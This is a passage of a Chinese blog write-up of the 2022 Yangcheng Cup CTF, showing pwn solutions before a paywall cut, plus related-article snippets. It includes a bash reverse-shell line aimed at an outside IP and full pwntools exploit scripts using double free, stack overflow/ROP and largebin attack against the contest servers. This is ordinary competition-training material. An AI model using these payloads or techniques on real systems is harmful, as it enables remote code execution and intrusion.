羊城杯2022--Writeup

最新推荐文章于 2024-05-13 15:13:16 发布
最新推荐文章于 2024-05-13 15:13:16 发布
阅读量1.8k 收藏 7
点赞数 7
分类专栏: CTF-Writeup 文章标签: python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61596829/article/details/126716752
版权

                                                                              -------TWe1v3、1amfree、scr1pt_k1ddi3

这个比赛太累了可,凌晨三点碰着枕头就睡着了,不过收获也蛮多的,这次题目很友好,不像wmCTF一样坐大牢。感谢两位大哥的实力带飞,太菜了我。全靠躺。

 

 

目录

Pwn

YCBSQL

fakeNoOutput

Dream

Web

rce_me

step_by_step-v3

Safepop

Crypto

EasyRsa

LRSA

Misc

签到

where_is_secret

迷失幻境

躲猫猫

Re

BBBButton

easyjs

Pwn

YCBSQL

这个应该是有了非预期,可以直接调用shell,我们直接反弹就行。

 

Payload:

.system bash -c "bash -i  >&/dev/tcp/101.43.255.238/7777 0>&1"

 

这个题目的漏洞就是在unlink的时候如果是unlink的头指针,那么后面的指针没有清空,就会是这样:

 

然后在free函数的时候,如果offset是0xff,那么后面的指针就都能释放掉,因此就会产生double free。

 

所以实际上就是一个double free的利用。这里我一开始是用的9.7的libc,之后直接改成9.2的就行。

from pwn import *
# r=process("/home/ubuntu/pwn/比赛/羊城杯/pwn/pwn")
r=remote("tcp.dasc.buuoj.cn",23916)
elf=ELF("/home/ubuntu/pwn/比赛/羊城杯/pwn/pwn")
# libc=ELF("/home/ubuntu/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc.so.6")
libc=ELF("/home/ubuntu/pwn/比赛/羊城杯/pwn/libc.so.6")
context(arch="amd64",os="linux",log_level="debug")
context.terminal = ['gnome-terminal','-x','sh','-c']

def meau(index):
    r.sendlineafter("Your choice:",str(index))

def add(size,content):
    meau(1)
    r.sendlineafter("Size:",str(size))
    r.sendafter("Content:",content)

def delete(index,offset):
    meau(2)
    r.sendlineafter("Index",str(index))
    r.sendlineafter("Input offset:",str(offset))

def link(id1,id2):
    meau(3)
    r.sendlineafter("link from:",str(id1))
    r.sendlineafter("link to:",str(id2))

def unlink(index,offset):
    meau(4)
    r.sendlineafter("Index:",str(index))
    r.sendlineafter("Input offset:",str(offset))

add(8,'a'*8)
add(8,'b'*8)
add(8,'c'*8)
add(8,'d'*8)

for i in range(8):
    add(0x70,p64(0)+p64(0X451))

link(0,1)
unlink(0,0)

delete(1,0xff)
add(8,'z'*8)
link(0,1)

meau(4)
r.sendlineafter("Index:",str(0))
r.recvuntil("Offset 1:")
heap_base=u64(r.recvuntil("\n")[:-1].ljust(8,b'\x00')) - 0x2e0
success("heap_base = "+hex(heap_base))
r.sendlineafter("Input offset:",str(1))

link(2,3)
unlink(2,0)
delete(3,0xff)

payload=p64(0)+p64(0x450)+p64(heap_base+0x3b0)
add(0x18,payload)

delete(2,0)

add(8,'/bin/sh\x00')
add(8,'z'*8)
add(0x60,"z"*8)

payload=p64(0)+p64(8)+p64(heap_base+0x460)
add(0x18,payload)

link(0,4)

meau(4)
r.sendlineafter("Index:",str(0))
libc_base=u64(r.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00")) - 0x10 -96 - libc.symbols['__malloc_hook']
success("libc_base = "+hex(libc_base))
r.sendlineafter("Input offset:",str(1))

system_addr=libc.symbols['system']+libc_base
free_hook=libc_base+libc.symbols['__free_hook']

delete(7,0)
delete(6,0)
delete(1,0)

payload=p64(free_hook)*3
add(0x60,payload)

add(0x60,payload)

add(0x70,p64(system_addr))
add(0x70,p64(system_addr))
delete(3,0)

r.interactive()

fakeNoOutput

这道题目就有点难受,首先是一堆的逆向操作。但是实际上就是一个栈溢出,并且溢出了非常多的字节。但是想要让程序执行到溢出点还是有点的困难。首先我们发现溢出点在upload里面的strcpy(s, haystack);这个部分,然后我们只需要让函数调用upload就可以溢出。但是首先要通过sub_804976F这个函数里面的验证,经过逆向调试发现,就是一个伪随机数,我们直接输入就行。然后溢出的自己大小和Content-Length有较大的关系,因此我们要设置Content-Length的大小来控制溢出的长度。之后由于函数限制的原因,无法ret2libc,因此我们经过精心构造,返回到http_puts函数,然后就能够泄露出got表里的内容,之后再返回主函数再溢出一次就行,就能够拿到shell。让人十分不解的是不知道为什么第二个端口一直打不通,泄露不出来东西,第一个端口多跑两次就能够打通远端。

 

from os import execve
from pwn import *
# r=process("/home/ubuntu/pwn/比赛/羊城杯/fakeNoOutput/fakeNoOutput")
r=remote("tcp.dasc.buuoj.cn",20432)
elf=ELF("/home/ubuntu/pwn/比赛/羊城杯/fakeNoOutput/fakeNoOutput")
libc=ELF("/home/ubuntu/pwn/比赛/羊城杯/fakeNoOutput/libc.so.6")

context(arch="i386",os="linux",log_level="debug")
context.terminal = ['gnome-terminal','-x','sh','-c']

payload="POST /upload /  "
r.sendline(payload)

payload2="Content-Length:0x4022\t"
r.sendline(payload2)
payload3="HTTP_SERVER1_token:wR5qH796Ky8D03r2W7syLB7406e30xP7\t"
r.sendline(payload3)
r.send("\n")

payload='Content:zzzzfilename=zzzz'
r.sendline(payload)

strlen_got=elf.got['strlen']
strstr_plt=elf.plt['strstr']
# payload=(p32(0x804D1a0)+p32(0x8049F77)+p32(0x804D010)).rjust(0x1040,b'a')+p32(0x804D1A0+0x103c-8)+p32(0x80496A8)
payload=b'b'*0x1040+p32(0x804D1A0+0x4000-4)+p32(0x80496A8)
payload=payload.ljust(0x4000,b'a')+p32(0x8049F77)+p32(0x804D010)
r.send(payload)

libc_base=u32(r.recvuntil(b"\xf7")[-4:].ljust(4,b"\x00")) - libc.symbols['strstr']
success("libc_base = "+hex(libc_base))

system_addr = libc_base+libc.symbols['system']
bin_sh=libc_base+libc.search(b'/bin/sh').__next__()
execve_addr=libc_base+libc.symbols['execve']

gadget1=0xcc9ab
gadget2=0x145f43
gadget3=0x145f44
one_gadget=libc_base+gadget1

payload="POST /upload /  "
r.sendline(payload)

payload2="Content-Length:0xece\t"
r.sendline(payload2)
payload3="HTTP_SERVER1_token:5lnPP74OkC4N9U8smBU812Smk1XxvRBJ\t"
r.sendline(payload3)
r.send("\n")

payload='Content:zzzzfilename=zzzz'
r.sendline(payload)

payload=b'c'*0xe9c+p32(execve_addr)+p32(0)+p32(bin_sh)+p32(0)*2
r.send(payload)

r.interactive()

Dream

说是dream,实际上就是一个largebin attack,然后UAF漏洞,函数功能还都比较齐全。主要是开启了沙箱不能拿到shell,并且show函数里面有一个加密的过程,想要泄露数据必须要完成逆向,之后我们直接利用qwb里面house of cat的做法,一次largebin attack攻击malloc assert即可实现orw读取flag并泄露。

 

from pwn import *
# r=process("/home/ubuntu/pwn/比赛/羊城杯/dream/dream")
r=remote("tcp.dasc.buuoj.cn",26422)
elf=ELF("/home/ubuntu/pwn/比赛/羊城杯/dream/dream")
libc=ELF("/home/ubuntu/glibc-all-in-one/libs/2.32-0ubuntu3_amd64/libc.so.6")

context(arch="amd64",os="linux",log_level="debug")
context.terminal = ['gnome-terminal','-x','sh','-c']

def meau(index):
    r.sendlineafter("choice: ",str(index))

def add(index,size,content):
    meau(1)
    r.sendlineafter("Give me a dream ID: ",str(index))
    r.sendlineafter("how long: ",str(size))
    r.sendafter("dream: ",content)

def delete(index):
    meau(2)
    r.sendlineafter("Which dream to wake?",str(index))

    
def show(index):
    meau(4)
    r.sendlineafter("Which dream do you want to show?",str(index))

def edit(index,content):
    meau(3)
    r.sendlineafter("Which dream to make?",str(index))
    r.sendafter("dream: ",content)

def de(payload,len):
   key = [9,5,2,7]
   v9 = 52 // len + 6
   delta = 0
   delta -= v9 * 0x61C88647
   delta &= 0xffffffff
   bk = payload[0]

   while(v9):

      for i in range(1,len)[::-1]:
         fd = payload[i - 1]
         payload[i] -= (((8 * bk) ^ (fd >> 7)) + ((bk >> 3) ^ (16 * fd))) ^ ((bk ^ delta) + (fd ^ key[((delta >> 2) & 3) ^ i & 3]))
         payload[i] &= 0xffffffff
         bk = payload[i]
      i -= 1
      fd = payload[len - 1]
      payload[0] -= (((8 * bk) ^ (fd >> 7)) + ((bk >> 3) ^ (16 * fd))) ^ ((bk ^ delta) + (fd ^ key[((delta >> 2) & 3) ^ i & 3]))
      payload[0] &= 0xffffffff
      bk = payload[0]

      delta += 0x61C88647
      delta &= 0xffffffff

      v9-=1
   return payload

add(0,0x420,'a')
add(1,0x400,'b')
add(2,0x410,"c")
delete(0)
delete(1)
show(0)

payloads=[]

for i in range(0x420//4):
    payloads.append(int.from_bytes(r.recv(4), "little"))

payloads=de(payloads,0x420//4)
main_arena=(payloads[0]+(payloads[1]<<32)) - 96
lib
最低0.47元/天 解锁文章
TW3lv3
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网鼎杯writeup-护网先锋1
08-04
【网鼎杯writeup-护网先锋1】的知识点总结: 在网络安全竞赛“网鼎杯”中,参赛者需要解决一系列挑战,这些挑战涉及到多种安全技术,如代码泄露、漏洞利用、加壳破解、文件格式分析等。以下是各部分的具体知识点: ...
羊城杯2022 部分题解
weixin_51122085的博客
09-04 2301
羊城杯2022 部分题解
php反序列化总结&刷题&pop链&原生类
小千安全
04-22 4016
思维导图 原理 未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,一个反序列化漏洞造成要有魔术方法,恰好魔术方法里面有危险函数,比如危险函数文件读取,命令执行,反序列化在数据传递,可能触发危险函数 知识点 1、什么是反序列化操作?-格式转换 2、为什么会出现安全漏洞?-魔术方法 3、反序列化漏洞如何发现? -对象逻辑 4、反序列化漏洞如何利用?-POP链构造 补充:反序列化利用大概分类三类 魔术方法的调用逻辑-如触发条件 语言原生类的调用逻辑-如SoapClient 语言自身的安全缺陷-
羊城2022 easyrsa
最新发布
amber_o0k的博客
05-13 106
【代码】羊城2022 easyrsa。
2022年羊城杯wp
xjh8023的博客
09-04 1716
大赛由中共广州市委网络安全和信息化委员会办公室作为指导单位,广州市网络安全产业促进会主办,广东外语外贸大学、杭州安恒信息技术股份有限公司承办,广州市信息安全测评中心、广州互联网协会协办。 大赛以“网络安全为人民、网络安全靠人民”为主题,旨在通过竞赛的方式提高参赛选手攻防兼备的网络安全实践技能,实现以赛促学、以赛会友,加强不同院校及单位间的技术交流。
羊城杯2022 部分web
weixin_43610673的博客
09-05 819
pearcmd.php文件包含,过滤了常用的几个命令选项,但还有个download。写个马丢到vps上,pear的过滤使用url编码绕过。
2022羊城杯密码wp
mxx307的博客
09-04 1020
2022羊城杯密码wp
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
2022-工大抗疫-web-writeup1
08-03
2022-工大抗疫-web-writeup1 本资源摘要信息聚焦于Web安全和网络协议相关知识点,涵盖了HTML、PHP、网络协议和Windows操作系统等多个方面。 一、网络协议 在Web开发中,网络协议扮演着重要角色。HTTP/1.1是目前最...
2022-HFCTF-江苏翔信二队-Writeup1
08-03
2022-HFCTF-江苏翔信二队-Writeup1 本文将围绕HFCTF-江苏翔信二队-Writeup1的 Writeup1,详细介绍该挑战题的知识点和解决思路。 首先,让我们来看一下题目的描述和标签。题目描述为空,标签包含“测试软件/插件 ...
2020-纵横杯-Writeup.pdf
03-15
2020年纵横杯CTF比赛Writeup 高清PDF版
第二届山石CTF冬令营 结营赛wp
网安小菜鸡
01-18 400
第二届山石CTF冬令营 结营赛wp
2022羊城杯 misc 迷失幻境 wp
路baby的博客
09-05 668
misc迷失幻境( •̀ ω •́ )y 前天打了一下羊城杯 觉的这个题挺有意思的 所以今天再给各位兄台复现一边(里面有可莉哦)( •̀ ω •́ )y
BeginCTF2024 wp web&&misc
永不落的梦想
02-06 1148
php反序列化,源码如下;B::__destruct()作为开头,调用A不存在的变量,触发A::__get(),调用Fun不存在的方法,触发__call的回调函数执行phpinfo,flag在phpinfo中;
POP链构造
VZS_0的博客
02-23 1658
wakeup的方法很简单,只需要将反序列化后的字符串,将对象属性数量改大,如,O:3:“fin”:3:{s:1:“a”;//或者env (linux下的命令),向call_user_func(fun类)的$p传递system命令参数。//m类里面没有page这个属性,此时的page会被自动认为是属性/方法,而不是类,触发get。// md5($this->md51) == md5($this->md52) 弱等于。
羊城杯2022
Pysnow's Blog
09-04 582
羊城杯2022wp
NSSCTF之Misc篇刷题记录⑩
Aluxian_的博客
05-11 1567
[CISCN 2022 初赛]ez_usb [SWPUCTF 2021 新生赛]你喜欢osu吗? [SWPUCTF 2021 新生赛]Bill [SWPUCTF 2021 新生赛]二维码不止有二维码 [HGAME 2022 week1]好康的流量 [红明谷CTF 2022]MissingFile [广东省大学生攻防大赛 2021]这是道签到题 [羊城杯 2022]签个到
利用PHP垃圾回收机制构造POP链
Tajang的大千世界
02-07 3202
一个小trick
羊城杯2022 部分misc writeup
wha1e的博客
09-04 723
羊城杯2022 部分misc writeup
羊城杯2020 wp
08-18
羊城杯2020是一场年度的电子竞技赛事,为广大电竞爱好者提供了一个展示技术和激发激情的舞台。今年的羊城杯聚集了来自全国各地的顶尖电竞选手,他们在各个游戏项目中展现了高水平的操作和战术。 在比赛的文化氛围方面,羊城杯2020鼓励团队协作和竞争精神,这对于参赛选手来说是一个很好的机会展现自己的技术能力和团队合作能力。此外,组委会还积极倡导公平竞赛,严禁使用任何形式的作弊或不正当手段来获取胜利,从而保证了比赛的公正性。 羊城杯2020不仅是一场竞技比赛,还提供了丰厚的奖金和荣誉,吸引了众多顶尖选手参与其中。参赛选手们通过紧张刺激的比赛,展现了他们的技术实力和战术策略。同时,比赛也为电竞爱好者们提供了一个观赏比赛和学习经验的机会,让他们更好地了解电竞运动,提高自己的技术水平。 此外,羊城杯2020还注重了普及电竞文化的意义。比赛在各个媒体平台上进行直播,使更多的观众能够通过网络或电视观看比赛,增加了电竞的曝光度。通过各种推广活动,羊城杯2020吸引了更多非电竞爱好者的关注,提高了电竞在社会中的认可度和影响力。 总的来说,羊城杯2020是一场令人期待的电竞盛事,它不仅展示了顶尖选手们的实力和技巧,也推广了电竞文化并吸引了更多人的关注。这样的比赛将继续推动电竞行业的发展和壮大,为电竞爱好者们带来更多的精彩赛事和娱乐体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值